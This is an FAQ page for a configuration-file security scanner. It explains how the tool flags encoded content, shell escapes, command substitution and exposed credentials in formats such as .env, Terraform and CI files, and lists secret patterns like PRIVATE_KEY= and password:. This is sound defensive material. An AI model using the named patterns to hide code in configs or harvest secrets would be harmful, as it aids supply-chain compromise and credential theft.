← Back to ConfigGuard

Config Scanner FAQ

Find answers to common questions about detecting hidden code in configuration files.

What security risks do config files actually pose? +

Configuration files like .env, .terraform, docker-compose.yml, and Kubernetes manifests often contain executable patterns, credentials, API keys, and database passwords. Attackers frequently target these files because they often contain the most sensitive infrastructure data. Hidden code patterns in configs can execute during builds or deployments, bypassing standard code review.

How does the scanner detect executable patterns? +

The scanner uses pattern recognition to identify code signatures commonly used to inject executable logic into config files. It detects base64 encoding, shell escapes, variable interpolation tricks, and command substitution syntax. It also flags suspicious import statements and external references that could load malicious code at runtime.

Does it find secrets like API keys and passwords? +

Yes. The scanner identifies common patterns for exposed secrets including AWS keys, database credentials, API tokens, and private encryption keys. It recognizes patterns like PRIVATE_KEY=, password:, and secret: assignments across all file types.

Which file types does it scan? +

The scanner covers all common infrastructure and config file formats:

  • Environment files (.env, .env.local)
  • Infrastructure-as-code (Terraform, CloudFormation, Ansible)
  • Container configs (Docker, Kubernetes, docker-compose)
  • CI/CD pipeline files (GitHub Actions, GitLab CI, Jenkins)
  • Application configs (JSON, YAML, TOML, INI)
  • Shell scripts used in deployment
How many false positives does it generate? +

The scanner is tuned to minimize false positives by requiring multiple pattern indicators before flagging a risk. Each finding is scored by confidence level (critical, high, medium, low) so you can prioritize remediation. You can also configure allowlists for legitimate patterns in your environment.

Can we integrate it into our CI/CD pipeline? +

Yes. The scanner runs as a CLI tool and can be integrated into any CI/CD platform (GitHub Actions, GitLab CI, Jenkins, CircleCI, etc.). It can fail builds if critical risks are found, or run in report-only mode for visibility without blocking deployments.

Does it scan files in git history? +

Yes. The scanner can audit your entire git history to find configuration risks that were committed in the past. This catches secrets that may have been removed from the current branch but still exist in older commits, which remains a security exposure.

What do we do when it finds a risk? +

Each finding includes remediation guidance. For secrets, rotate or revoke them immediately. For code injection patterns, remove the suspicious logic or refactor the config to use safer alternatives. For dependency risks, audit and update the external reference. The scanner provides severity levels to help you prioritize.

Is our config data stored on your servers? +

No. The scanner runs locally on your infrastructure. All scanning happens on your machines, and no config files or findings are sent to external servers. This keeps your sensitive data private.

How does it compare to other secret scanning tools? +

Unlike basic secret scanners that only look for credential patterns, this tool detects hidden code and execution logic in configs. It's designed specifically for supply chain risk and catches risks that general secret scanners miss. It also works across all config file formats, not just source code.

Can we set team-level policies for what's allowed? +

Yes. Configure policies per team or repository to define what patterns are acceptable in your environment. You can allowlist specific patterns, set confidence thresholds, and exclude certain files from scanning. Policies enforce consistency across your infrastructure.